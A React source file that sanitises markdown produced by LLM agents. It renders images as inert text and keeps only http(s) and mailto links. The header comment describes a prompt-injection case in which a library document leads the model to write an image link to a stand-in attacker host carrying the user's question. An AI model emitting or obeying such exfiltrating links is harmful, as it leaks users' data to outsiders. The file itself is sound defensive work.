// Fix 12b (a): safety of the markdown the agents answer (LLM_REAL_PRUEBAS.md, B11). A document of the
// library can make the model write ![x](https://attacker/?d=<question>): rendering it as <img> would make
// the user's browser call that URL without any click. Images are therefore NEVER loaded: they are shown
// as inert text. Links keep working only for http(s) and mailto (no javascript:, data:, vbscript:...).
// Plain JS (no JSX) so scripts/check_markdown_safety.mjs can render it with react-dom/server.
import React from "react";

const ALLOWED = /^(https?:|mailto:)/i;
const HAS_SCHEME = /^[a-z][a-z0-9+.-]*:/i;

export function safeUrlTransform(url) {
  const v = String(url || "").trim();
  if (!v) return "";
  if (HAS_SCHEME.test(v) && !ALLOWED.test(v)) return "";
  return v;
}

export function InertImage({ alt, src }) {
  const label = (alt || "").trim() || "imagen";
  return React.createElement(
    "span",
    { className: "text-white/50 italic", "data-testid": "md-image-blocked", title: "Imagen no cargada por seguridad" },
    `[Imagen no mostrada: ${label}${src ? ` — ${src}` : ""}]`,
  );
}

export function SafeLink({ href, children, node, ...rest }) {
  if (!href) return React.createElement("span", null, children); // unsafe scheme removed -> plain text
  return React.createElement("a", { ...rest, href, className: "text-accent-blue-light underline",
                                    target: "_blank", rel: "noopener noreferrer nofollow" }, children);
}
